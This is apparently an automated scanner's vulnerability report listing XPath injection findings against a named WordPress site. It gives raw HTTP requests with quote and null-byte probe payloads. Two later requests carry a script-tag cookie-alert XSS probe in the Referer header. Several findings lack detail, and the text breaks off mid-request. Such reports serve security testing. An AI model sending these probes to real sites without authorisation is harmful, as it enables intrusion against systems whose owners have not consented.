XPath Injection, Various Hosts, Vulnerability Report

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

1.1. http://www.installsoftware.com/favicon.ico [REST URL parameter 1] next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /favicon.ico' HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863; wordpress_test_cookie=WP+Cookie+check

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:20:55 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 20:20:56 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44240

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.2. http://www.installsoftware.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /favicon.ico?1%00'=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863; wordpress_test_cookie=WP+Cookie+check

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:20:34 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 20:20:35 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.3. http://www.installsoftware.com/wp-admin/css/colors-fresh.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-admin/css/colors-fresh.css

Issue detail

Request

GET /wp-admin'/css/colors-fresh.css HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:15:25 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:15:26 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.4. http://www.installsoftware.com/wp-admin/css/colors-fresh.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-admin/css/colors-fresh.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-admin/css'/colors-fresh.css HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:15:47 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:15:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.5. http://www.installsoftware.com/wp-admin/css/colors-fresh.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-admin/css/colors-fresh.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-admin/css/colors-fresh.css' HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:16:08 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:16:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.6. http://www.installsoftware.com/wp-admin/css/colors-fresh.css [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-admin/css/colors-fresh.css

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-admin/css/colors-fresh.css HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:15:04 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:15:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.7. http://www.installsoftware.com/wp-admin/css/colors-fresh.css [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-admin/css/colors-fresh.css

Issue detail

Request

GET /wp-admin/css/colors-fresh.css?1%00'=1 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:14:53 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Mon, 31 Jan 2011 20:14:53 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.8. http://www.installsoftware.com/wp-admin/css/colors-fresh.css [ver parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-admin/css/colors-fresh.css

Issue detail

The ver parameter appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the ver parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-admin/css/colors-fresh.css?ver=20100610%00' HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/wp-login.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863; wordpress_test_cookie=WP+Cookie+check

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:11 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44337

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.9. http://www.installsoftware.com/wp-admin/css/login.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-admin/css/login.css

Issue detail

Request

GET /wp-admin'/css/login.css HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:14:23 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:14:23 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.10. http://www.installsoftware.com/wp-admin/css/login.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-admin/css/login.css

Issue detail

Request

GET /wp-admin/css'/login.css HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:14:53 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:14:53 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.11. http://www.installsoftware.com/wp-admin/css/login.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-admin/css/login.css

Issue detail

Request

GET /wp-admin/css/login.css' HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:15:36 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:15:36 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.12. http://www.installsoftware.com/wp-admin/css/login.css [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-admin/css/login.css

Issue detail

Request

GET /wp-admin/css/login.css HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:14:01 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:14:02 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.13. http://www.installsoftware.com/wp-admin/css/login.css [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-admin/css/login.css

Issue detail

Request

GET /wp-admin/css/login.css?1%00'=1 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:13:51 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Mon, 31 Jan 2011 20:13:51 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44468

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.14. http://www.installsoftware.com/wp-admin/css/login.css [ver parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-admin/css/login.css

Issue detail

Request

GET /wp-admin/css/login.css?ver=20100601%00' HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/wp-login.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863; wordpress_test_cookie=WP+Cookie+check

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:58 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.15. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/light.css

Issue detail

Request

GET /wp-content'/themes/rt_mynxx_wp/css/light.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:11 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.16. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/light.css

Issue detail

Request

GET /wp-content/themes'/rt_mynxx_wp/css/light.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
